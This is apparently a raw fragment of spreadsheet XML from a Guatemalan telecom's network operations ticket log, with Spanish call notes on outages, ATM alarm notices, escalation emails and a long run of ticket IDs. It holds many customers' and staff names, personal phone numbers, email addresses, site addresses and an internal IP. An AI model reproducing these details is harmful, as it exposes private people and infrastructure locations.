KENNY ROBERT RIVERA JUAREZ
MIÉ 11/05/2022 14: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0316
ID: 349900207T
IDENTIFICADOR DEL CLIENTE: CC_IJSUD_GT_NUEVA_SANTA_ROSA
UBICADO EN: INTERNET.- 3 AVENIDA ENTRE 9 Y 10 CALLE ZONA 1 NUEVA SANTA ROSA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4560332</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE Y RESPONDE LEONIDAS ORTIZ, QUIEN INDICA QUE EL EQUIPO QUE ETX1 SE ENCUENTRA SIN LINK DE FIBRA, SE SOLICITA APLICA REINICIO PERO QUEDA EN EL MISMO ESTADO, SE PROCEDE A COORIDINAR VISITA.
1001853259
COLA:
NOMBRE: A: 0050522243510
NÚMERO: 0050522243510
DURACIÓN: 0:10:09
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 0050522243510
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 11/05/2022 16:00:21</t>
  </si>
  <si>
    <t>F4560340</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JONATHAN BORRAYO 55336757 MENCIONA QUE PERSISTE LA CAIDA DEL SERVICIO PERO BRINDA CONTACTO DE SU IT JONATHAN CALDERON 49060207
-ID 1001856479</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SELVIN OROZCO 35186103  NO RESPONDE, SE INTENARA LUEGO
-ID 1001856175</t>
  </si>
  <si>
    <t>F4560361</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALEX 24415919 QUIEN REINICIA LOS EQUIPOS PERO INDICA QUE PERSISTE EL INCONVENIENTE CON EL INTERNET, SE DEJA EN CONFERENCIA CON AXEL
-ID 1001843696</t>
  </si>
  <si>
    <t>F4560369</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ANA DIAZ AL 70518343 CLIENTE INFORMA QUE NO CUENTA CON SERVICIO || SE LOCALIZA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
ID 1001860099
**</t>
  </si>
  <si>
    <t>F4560381</t>
  </si>
  <si>
    <t>SE NOTIFICA ALARMA EN EL MONITOREO
KENNY ROBERT RIVERA JUAREZ
MIÉ 11/05/2022 15:43
ESTIMADO CLIENTE,
TENEMOS ALARMA CON RESPECTO AL SERVICIO DEL ATM: ATM23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0381
ID: 47501953T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM2376
UBICADO EN: CAJERO 2376 INGENIO MAGDALENA, KM.99 CARR A SIPACATE LA DEMOCRACIA ESCUINTLA INT. FINCA BOUGAVILIA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4560412</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MIGUEL PEREZ AL 48533050 CLIENTE INFORMA QUE VERIFICARA PERO SE CORTA LLAMADA || SE INTENTA NUEVAMENTE Y NO RESPONDE || SE INTENTARA LUEGO**
ID 1001862706 -1001863376 - 1001863683
**</t>
  </si>
  <si>
    <t>-* SE HABLA CON MIGUEL PEREZ (CLIENTE) INFORMA QUE SE ENCUENTRA EN SITIO, SE DEJA EN CONFERENCIA CON BYRON GOMEZ (GESTOR) PARA VALIDACIONES Y/O PRUEBAS -*
*</t>
  </si>
  <si>
    <t>F4560415</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  MARIO BARRILLA 78423989 - 78504674 PRIMER NUMERO NO RESPONDE Y EL SEGUNDO INDICAN NUMERO EQUIVOCADO
-ID 1001885305 - 1001885445</t>
  </si>
  <si>
    <t>F4560416</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOHANNA MONTAYA 22636999 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001860886</t>
  </si>
  <si>
    <t>F4560430</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE INDCIA QUE LOS EQUIPOS ESTABAN APAGADOS, Y YA SE ENCUNTRA OPERATIVO AUTORIZANDO CIERRE DE TICKET
1001878091
COLA:
NOMBRE: A: 0050585857521
NÚMERO: 0050585857521
DURACIÓN: 0:00:45
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 0050585857521
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 11/05/2022 17:15:01</t>
  </si>
  <si>
    <t xml:space="preserve">
SE CONVERSA CON CLIENTE, INDICA QUE NO LOGRA IDENTIFICAS LOS EQUIPOS, POR LO QUE SE LE SOLICITAN FOTOS VIA WHATSAPP PARA APOYARLE EN IDENTFICARLOS
1001862745
COLA:
NOMBRE: A: 0050585857521
NÚMERO: 0050585857521
DURACIÓN: 0:03:22
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 0050585857521
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 11/05/2022 16:25:05</t>
  </si>
  <si>
    <t>F4560432</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SRTA. SCARLET  89712105  ...</t>
  </si>
  <si>
    <t>CLIENTE SRTA. SCARLET  89712105 VALIDA CONEXIONES INFORMA QUE ETX-1 NO ENCIENDE, YA CAMBIO DE TOMA CORRIENTE PERO AUN NO ENCIENDE, SE SOLICITA APOYO PARA VISITA TECNICA, SE ADJUNTA FORMATO, GRACIAS.</t>
  </si>
  <si>
    <t>F4560443</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HEBER ROMERO 95034879  MENCIONA QUE ESTARA REALIZANDO PRUEBAS POR LO QUE SOLICITA LLAMADA EN 10 MIN
-ID 1001867196</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE HEBER ROMERO 95034879 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE LE NOTIFICA QUE DE LADO DE CLARO TODO FUNCIONA CORRECTAMENTE, SE LE NOTIFICA QUE SE ENVIARAN LAS PRUEBAS POR CORREO
AYALAROMEROH@GMAIL.COM
-ID 1001871456</t>
  </si>
  <si>
    <t>F4560453</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE
DE: ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 11 DE MAYO DE 2022 18:03
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; RUIZ GARCÍA KARINA &lt;KRUIZ@UNINET.COM.MX&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL #PA-MNCGMD0007M-P## ::: TICKET CNOC IMGMD005000::: "LINK DOWN"
BUENAS NOCHES ESTIMADOS(A):
COMO PARTE DEL SEGUIMIENTO AL CASO #PA-MNCGMD0007M-P##: TICKET CNOC IMGMD005000: SOLICITAMOS DE SU AMABLE APOYO PARA VALIDAR SI AÚN PERSISTEN LOS INCONVENIENTES ANTES PLANTEADOS. SE OBSERVA DE NUESTRA PARTE ENLACE OPERATIVO LLEGANDO SIN PROBLEMAS A IP WAN DE PUNTO REMOTO CON BGP ESTABLECIDO. GRACIAS DE ANTEMANO. SALUDOS CORDIALES.
FIGURA 1. ENLACE OPERATIVO CON BGP ESTABLECIDO HACE CASI 2 HORAS.</t>
  </si>
  <si>
    <t>F4560462</t>
  </si>
  <si>
    <t>SE LOGRA HABLAR CON EL CLIENTE JUAN GABRIEL QUIEN INDICA QUE YA NO ESTA EN LAS INSTALACIONES.
SOLICITA QUE SE LE LLAME EL DIA DE MAÑANA DE 8:00AM HASTA LAS 16:00HRS.
1001876696
COLA:
NOMBRE: A: 57694649
NÚMERO: 57694649
DURACIÓN: 0:00:29
ESTADO: CONECTADA
DETALLES: 57694649
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 11/05/2022 17:09:11</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE JUAN GABRIEL PERO ENVIA A BUZON
1001871893
COLA:
NOMBRE: A: 57694649
NÚMERO: 55280199
DURACIÓN: 0:00:08
ESTADO: CONECTADA
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 11/05/2022 16:50:32</t>
  </si>
  <si>
    <t>F4560464</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE OSCAR TORRES DE LA CENTRAL, PERO NO CONTESTA.
ES NECESARIO INFORMALE QUE POR PARTE DEL CLARO EL SERVICIO ESTA OPERATIVO, PERO LA PBX NO RESPONDE.
1001879688, 1001879787, 1001879842
COLA:
NOMBRE: A: 48656684
NÚMERO: 55280199
DURACIÓN: 0:00:22
ESTADO: CONECTADA
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 11/05/2022 17:21:03</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE OSCAR TORRES PERO ENVIA A BUZON.
1001888120
COLA:
NOMBRE: A: 48656684
NÚMERO: 55280199
DURACIÓN: 0:00:36
ESTADO: CONECTADA
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 11/05/2022 17:59:32</t>
  </si>
  <si>
    <t>F4560471</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARIA LUNA 41285418 MENCIONA QUE SU IT ES NELSON REYES 47072244 YA QUE REALIZARON PRUEBAS Y NO LLEGABAN AL ANCHO DE BANDA CONTRATADO
-ID 1001877863</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE NELSON REYES 47072244 MENCIONA QUE NO LLEGAN AL ANCHO DE BANDA CONTRATADO, SE DEJA EN CONFERENCIA CON AXEL
-ID 1001879466</t>
  </si>
  <si>
    <t>F4560472</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE SOLICITANDO
RE: TICKET#20484265 ¿ CAÍDA ENLACE LA_UNION-CL-IP2148072</t>
  </si>
  <si>
    <t>SE LLAMA NUEVAMENTE A MESA DE SERVICIO QUIEN INDICA QUE NO RECIBIO CORREO ENVIADO ANTERIOR. SE ENVIA NUEVAMENTE PARA SEGUIMIENTO DEL CASO, COMENTAN CORREO RECIBIDO Y AL TENER INFORMACION DE BANCO AGRICOLA ESTARAN RESPONDIENDO---</t>
  </si>
  <si>
    <t>F4560478</t>
  </si>
  <si>
    <t>DE: ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 11 DE MAYO DE 2022 17:57
PARA: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; MEJICANOS CORONADO, LUIS ALBERTO &lt;LMEJICANOS@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CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; ROBIN AGUILAR &lt;ROBIN.AGUILAR@CLARO.COM.GT&gt;; SOC TECNOLOGÍA &lt;SOCBI@BI.COM.GT&gt;; MARIO RODOLFO RODAS GONZALEZ &lt;MARIO.RODAS@CLARO.COM.GT&gt;
CC: SEGURIDAD TI &lt;SEGURIDADTI@BI.COM.GT&gt;; CIBERSEGURIDAD &lt;CIBERSEGURIDAD@BI.COM.GT&gt;; SEGURIDADINFORMACION &lt;SEGURIDADINFORMACION@BI.COM.GT&gt;
ASUNTO: RE: REPORTE DE PHISHING
BUENAS TARDES ESTIMADOS (A):
COMO PARTE DEL SEGUIMIENTO AL CASO, LAS ACCIONES SOLICITADAS YA FUERON REALIZADAS. SOLICITAMOS DE SU AMABLE APOYO PARA VALIDAR. GRACIAS. SALUDOS CORDIALES
ALEJANDRO NAVARRO FDEZ
GESTOR_N1</t>
  </si>
  <si>
    <t>F4560496</t>
  </si>
  <si>
    <t>SE ESTARA AL PENDIENTE DE QUE RETORNE ENERGIA ELECTRICA EN SECTOR.</t>
  </si>
  <si>
    <t>F4560510</t>
  </si>
  <si>
    <t>SE NOTIFICA ALARMA EN EL MONITOREO PROACTIVO
KENNY ROBERT RIVERA JUAREZ
MIÉ 11/05/2022 17:34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0510
ID: 8600197T
IDENTIFICADOR DEL CLIENTE: CC_BAC_GT_AV_PETAPA_Z12_INTERNET
UBICADO EN:   INTERNET_AVENIDA PETAPA 24-25 ZONA 12, GUATEMALA, GUATEMALA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4560512</t>
  </si>
  <si>
    <t>SE LLAMA AL 23049696  1-1 ATIENDE MELVIN CHACON SE LE INFORMA DEL INCIDENTE, CONFIRMA DE ENTERADO SOLICITA LLAMAR MAÑANA A LAS 10 AM PARA VALIDAR ENLACE. ID: 1001884418.</t>
  </si>
  <si>
    <t>F4560531</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE ANDREA MARROQUIN, PERO YA NO CONTESTA. SE DARA SEGUIMIENTO EL DIA DE MAÑANA.
1001893513, 1001893581,1001893617
COLA:
NOMBRE: A: 47704683
NÚMERO: 47704683
DURACIÓN: 0:00:15
ESTADO: MARCANDO
DETALLES: 47704683
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 11/05/2022 18:34:41</t>
  </si>
  <si>
    <t>F4560547</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: MIÉRCOLES, 11 DE MAYO DE 2022 18:39PARA: SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;; MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_TYT_GT_ATM016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0547
ID: 47500798T
IDENTIFICADOR DEL CLIENTE:  CC_TYT_GT_ATM0163
UBICADO EN:  ATM163 7 AVENIDA Y 5 CALLE ZONA 1 POPTUN PETEN AG. BANRURAL
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4560563</t>
  </si>
  <si>
    <t>DE: ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 11 DE MAYO DE 2022 19:29
PARA: TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; GARCIA GARCIA ROBERTO_26925739 &lt;GGARCIAR@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; JUAN MANUEL CARDONA SALAMA &lt;JUANM.CARDONA@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 588100012T ::: TICKET CNOC IMBBL003848 ::: " LINK FLAP"
BUENAS NOCHES ESTIMADOS(A):
COMO PARTE DEL SEGUIMIENTO AL CASO ID LOCAL 588100012T ::: TICKET CNOC IMBBL003848 ::: " LINK FLAP, SOLICITAMOS DE SU AMABLE APOYO PARA VALIDAR SI AÚN PERSISTEN LOS INCONVENIENTES ANTES PLANTEADOS. SE OBSERVA DE NUESTRA PARTE ENLACE OPERATIVO LLEGANDO SIN PROBLEMAS A IP WAN DE PUNTO REMOTO. GRACIAS DE ANTEMANO. SALUDOS CORDIALES.
FIGURA 1. SE VALIDA ENLACE OPERATIVO ALCANZABLE A NIVEL DE PING.</t>
  </si>
  <si>
    <t>F4560610</t>
  </si>
  <si>
    <t>SE GENERA FALLA MASIVA F4560658 || CAIDA TOTAL || ETX-1300 RAD  TELA 04 || 10.82.47.90 || MASIVO_HN |</t>
  </si>
  <si>
    <t>F4560645</t>
  </si>
  <si>
    <t>F4560750</t>
  </si>
  <si>
    <t>***--- SE RETROALIMENTA A CL- Y SE SOLICITAN CONTACTOS EN SITIO -**
DE: CORPOWALMART
ENVIADO EL: JUEVES, 12 DE MAYO DE 2022 01:26
PARA: 'VICTOR NUNEZ (VENDOR)' &lt;VICTOR.NUNEZ2@WALMART.COM&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; ERICK ORELLANA (VENDOR) &lt;ERICK.ORELLANA0@WALMART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
ASUNTO: RE: ENLACE CAÍDO DE DF LO DE REYES ID: 344400263
BUENOS DÍAS ESTIMADO SR. NUÑEZ.
                RESPECTO AL SEGUIMIENTO DEL CASO, PERSONAL A CARGO NOS INDICA QUE ES NECESARIO REALIZAR PRUEBAS CON EQUIPOS EN SITIO.
PODRÍA APOYARNOS EN INDICAR LOS CONTACTOS EN SITIO O REALIZANDO CONFERENCIA PARA DICHAS PRUEBAS.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.
DE: VICTOR NUNEZ (VENDOR) [MAILTO:VICTOR.NUNEZ2@WALMART.COM]
ENVIADO EL: JUEVES, 12 DE MAYO DE 2022 01:22
PARA: CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; ERICK ORELLANA (VENDOR) &lt;ERICK.ORELLANA0@WALMART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
ASUNTO: RE: ENLACE CAÍDO DE DF LO DE REYES ID: 344400263
BUENAS NOCHES TENEMOS AVANCES CON RESPECTO A ESTE CASO.
SALUDOS CORDIALES;</t>
  </si>
  <si>
    <t>***--- CL COMPARTE CONTACTOS Y SOLICITA SE LLAME A PR A LAS 06:00 --**
DE: VICTOR NUNEZ (VENDOR) [MAILTO:VICTOR.NUNEZ2@WALMART.COM]
ENVIADO EL: JUEVES, 12 DE MAYO DE 2022 01:59
PARA: CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; ERICK ORELLANA (VENDOR) &lt;ERICK.ORELLANA0@WALMART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
ASUNTO: RE: ENLACE CAÍDO DE DF LO DE REYES ID: 344400263
BUEN DÍA, POR MOTIVO QUE TIENDA SE ENCUENTRA CERRADA, PARA DESCARTES DE PRIMER NIVEL SERÍA DESPUÉS DE LAS 6:00 AM.
CONTACTO EN TIENDA:
FREDDY TARTON: +502- 48194114
+502-42191814
SALUDOS CORDIALES;</t>
  </si>
  <si>
    <t>F4560754</t>
  </si>
  <si>
    <t>***--- CL COMPARTE CONTACTOS E INDICA QUE SE LLAME A LAS 06:00 A PR ----*
DE: VICTOR NUNEZ (VENDOR) [MAILTO:VICTOR.NUNEZ2@WALMART.COM]
ENVIADO EL: JUEVES, 12 DE MAYO DE 2022 02:05
PARA: CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; ERICK ORELLANA (VENDOR) &lt;ERICK.ORELLANA0@WALMART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
ASUNTO: RE: ENLACE CAÍDO DE DF SONZACATE NORTE ID: IP2170017
BUEN DÍA, POR ESTAR TIENDA CERRADA, DESPUÉS DE LAS 06 AM PUEDEN CONTACTAR A:
MARGARITA RAMÍREZ,
TELÉFONO +503- 4071221
  +503-70399517
SALUDOS CORDIALES;</t>
  </si>
  <si>
    <t>F4452954</t>
  </si>
  <si>
    <t>F4503624</t>
  </si>
  <si>
    <t>F4505006</t>
  </si>
  <si>
    <t>F4505346</t>
  </si>
  <si>
    <t>F4505616</t>
  </si>
  <si>
    <t>F4505982</t>
  </si>
  <si>
    <t>F4506115</t>
  </si>
  <si>
    <t>F4507188</t>
  </si>
  <si>
    <t>F4508281</t>
  </si>
  <si>
    <t>F4508482</t>
  </si>
  <si>
    <t>F4509618</t>
  </si>
  <si>
    <t>F4509846</t>
  </si>
  <si>
    <t>F4510367</t>
  </si>
  <si>
    <t>F4510752</t>
  </si>
  <si>
    <t>F4510913</t>
  </si>
  <si>
    <t>F4510956</t>
  </si>
  <si>
    <t>F4511028</t>
  </si>
  <si>
    <t>F4511030</t>
  </si>
  <si>
    <t>F4511098</t>
  </si>
  <si>
    <t>F4511286</t>
  </si>
  <si>
    <t>F4511438</t>
  </si>
  <si>
    <t>F4511530</t>
  </si>
  <si>
    <t>F4511651</t>
  </si>
  <si>
    <t>F4511699</t>
  </si>
  <si>
    <t>F4511704</t>
  </si>
  <si>
    <t>F4511844</t>
  </si>
  <si>
    <t>F4511869</t>
  </si>
  <si>
    <t>F4511888</t>
  </si>
  <si>
    <t>F4511930</t>
  </si>
  <si>
    <t>F4511944</t>
  </si>
  <si>
    <t>F4511956</t>
  </si>
  <si>
    <t>F4512045</t>
  </si>
  <si>
    <t>F4512091</t>
  </si>
  <si>
    <t>F4512093</t>
  </si>
  <si>
    <t>F4512101</t>
  </si>
  <si>
    <t>F4512141</t>
  </si>
  <si>
    <t>F4512203</t>
  </si>
  <si>
    <t>F4512209</t>
  </si>
  <si>
    <t>F4512233</t>
  </si>
  <si>
    <t>F4512259</t>
  </si>
  <si>
    <t>F4512267</t>
  </si>
  <si>
    <t>F4512288</t>
  </si>
  <si>
    <t>F4512291</t>
  </si>
  <si>
    <t>F4512321</t>
  </si>
  <si>
    <t>F4512324</t>
  </si>
  <si>
    <t>F4512338</t>
  </si>
  <si>
    <t>F4512348</t>
  </si>
  <si>
    <t>F4512364</t>
  </si>
  <si>
    <t>F4512374</t>
  </si>
  <si>
    <t>F4512382</t>
  </si>
  <si>
    <t>F4512387</t>
  </si>
  <si>
    <t>F4512391</t>
  </si>
  <si>
    <t>F4512397</t>
  </si>
  <si>
    <t>F4512413</t>
  </si>
  <si>
    <t>F4512446</t>
  </si>
  <si>
    <t>F4512458</t>
  </si>
  <si>
    <t>F4512467</t>
  </si>
  <si>
    <t>F4512477</t>
  </si>
  <si>
    <t>F4512543</t>
  </si>
  <si>
    <t>F4512562</t>
  </si>
  <si>
    <t>F4512576</t>
  </si>
  <si>
    <t>F4512583</t>
  </si>
  <si>
    <t>F4512593</t>
  </si>
  <si>
    <t>F4512639</t>
  </si>
  <si>
    <t>F4512648</t>
  </si>
  <si>
    <t>F4512809</t>
  </si>
  <si>
    <t>F4512810</t>
  </si>
  <si>
    <t>F4512848</t>
  </si>
  <si>
    <t>F4512851</t>
  </si>
  <si>
    <t>F4512852</t>
  </si>
  <si>
    <t>F4512853</t>
  </si>
  <si>
    <t>F4512879</t>
  </si>
  <si>
    <t>F4512889</t>
  </si>
  <si>
    <t>F4512893</t>
  </si>
  <si>
    <t>F4512908</t>
  </si>
  <si>
    <t>F4512923</t>
  </si>
  <si>
    <t>F4512935</t>
  </si>
  <si>
    <t>F4512939</t>
  </si>
  <si>
    <t>F4513016</t>
  </si>
  <si>
    <t>F4513030</t>
  </si>
  <si>
    <t>F4513038</t>
  </si>
  <si>
    <t>F4513043</t>
  </si>
  <si>
    <t>F4513054</t>
  </si>
  <si>
    <t>F4513101</t>
  </si>
  <si>
    <t>F4513106</t>
  </si>
  <si>
    <t>F4513114</t>
  </si>
  <si>
    <t>F4513117</t>
  </si>
  <si>
    <t>F4513148</t>
  </si>
  <si>
    <t>F4513160</t>
  </si>
  <si>
    <t>F4513177</t>
  </si>
  <si>
    <t>F4513202</t>
  </si>
  <si>
    <t>F4513226</t>
  </si>
  <si>
    <t>F4513237</t>
  </si>
  <si>
    <t>F4513257</t>
  </si>
  <si>
    <t>F4513261</t>
  </si>
  <si>
    <t>F4513278</t>
  </si>
  <si>
    <t>F4513283</t>
  </si>
  <si>
    <t>F4513287</t>
  </si>
  <si>
    <t>F4513310</t>
  </si>
  <si>
    <t>F4513311</t>
  </si>
  <si>
    <t>F4513363</t>
  </si>
  <si>
    <t>F4513429</t>
  </si>
  <si>
    <t>F4513434</t>
  </si>
  <si>
    <t>F4513437</t>
  </si>
  <si>
    <t>F4513463</t>
  </si>
  <si>
    <t>F4513471</t>
  </si>
  <si>
    <t>F4513485</t>
  </si>
  <si>
    <t>F4513489</t>
  </si>
  <si>
    <t>F4513497</t>
  </si>
  <si>
    <t>F4513507</t>
  </si>
  <si>
    <t>F4513520</t>
  </si>
  <si>
    <t>F4513527</t>
  </si>
  <si>
    <t>F4513538</t>
  </si>
  <si>
    <t>F4513552</t>
  </si>
  <si>
    <t>F4513558</t>
  </si>
  <si>
    <t>F4513565</t>
  </si>
  <si>
    <t>F4513579</t>
  </si>
  <si>
    <t>F4513582</t>
  </si>
  <si>
    <t>F4513583</t>
  </si>
  <si>
    <t>F4513584</t>
  </si>
  <si>
    <t>F4513586</t>
  </si>
  <si>
    <t>F4513587</t>
  </si>
  <si>
    <t>F4513597</t>
  </si>
  <si>
    <t>F4513598</t>
  </si>
  <si>
    <t>F4513604</t>
  </si>
  <si>
    <t>F4513621</t>
  </si>
  <si>
    <t>F4513626</t>
  </si>
  <si>
    <t>F4513644</t>
  </si>
  <si>
    <t>F4513655</t>
  </si>
  <si>
    <t>F4513658</t>
  </si>
  <si>
    <t>F4513662</t>
  </si>
  <si>
    <t>F4513675</t>
  </si>
  <si>
    <t>F4513678</t>
  </si>
  <si>
    <t>F4513683</t>
  </si>
  <si>
    <t>F4513685</t>
  </si>
  <si>
    <t>F4513691</t>
  </si>
  <si>
    <t>F4513704</t>
  </si>
  <si>
    <t>F4513727</t>
  </si>
  <si>
    <t>F4513732</t>
  </si>
  <si>
    <t>F4513758</t>
  </si>
  <si>
    <t>F4513772</t>
  </si>
  <si>
    <t>F4513779</t>
  </si>
  <si>
    <t>F4513819</t>
  </si>
  <si>
    <t>F4513848</t>
  </si>
  <si>
    <t>F4513851</t>
  </si>
  <si>
    <t>F4513854</t>
  </si>
  <si>
    <t>F4513878</t>
  </si>
  <si>
    <t>F4513881</t>
  </si>
  <si>
    <t>F4513897</t>
  </si>
  <si>
    <t>F4513920</t>
  </si>
  <si>
    <t>F4513950</t>
  </si>
  <si>
    <t>F4513959</t>
  </si>
  <si>
    <t>F4513967</t>
  </si>
  <si>
    <t>F4513969</t>
  </si>
  <si>
    <t>F4514027</t>
  </si>
  <si>
    <t>F4514031</t>
  </si>
  <si>
    <t>F4514046</t>
  </si>
  <si>
    <t>F4514047</t>
  </si>
  <si>
    <t>F4514056</t>
  </si>
  <si>
    <t>F4514071</t>
  </si>
  <si>
    <t>F4514088</t>
  </si>
  <si>
    <t>F4514093</t>
  </si>
  <si>
    <t>F4514098</t>
  </si>
  <si>
    <t>F4514101</t>
  </si>
  <si>
    <t>F4514108</t>
  </si>
  <si>
    <t>F4514109</t>
  </si>
  <si>
    <t>F4514119</t>
  </si>
  <si>
    <t>F4514131</t>
  </si>
  <si>
    <t>F4514133</t>
  </si>
  <si>
    <t>F4514135</t>
  </si>
  <si>
    <t>F4514143</t>
  </si>
  <si>
    <t>F4514153</t>
  </si>
  <si>
    <t>F4514154</t>
  </si>
  <si>
    <t>F4514155</t>
  </si>
  <si>
    <t>F4514158</t>
  </si>
  <si>
    <t>F4514160</t>
  </si>
  <si>
    <t>F4514161</t>
  </si>
  <si>
    <t>F4514162</t>
  </si>
  <si>
    <t>F4514165</t>
  </si>
  <si>
    <t>F4514169</t>
  </si>
  <si>
    <t>F4514170</t>
  </si>
  <si>
    <t>F4514182</t>
  </si>
  <si>
    <t>F4514186</t>
  </si>
  <si>
    <t>F4514207</t>
  </si>
  <si>
    <t>F4514210</t>
  </si>
  <si>
    <t>F4514211</t>
  </si>
  <si>
    <t>F4514212</t>
  </si>
  <si>
    <t>F4514216</t>
  </si>
  <si>
    <t>F4514217</t>
  </si>
  <si>
    <t>F4514222</t>
  </si>
  <si>
    <t>F4514223</t>
  </si>
  <si>
    <t>F4514227</t>
  </si>
  <si>
    <t>F4514236</t>
  </si>
  <si>
    <t>F4514254</t>
  </si>
  <si>
    <t>F4514259</t>
  </si>
  <si>
    <t>F4514265</t>
  </si>
  <si>
    <t>F4514279</t>
  </si>
  <si>
    <t>F4514337</t>
  </si>
  <si>
    <t>F4514344</t>
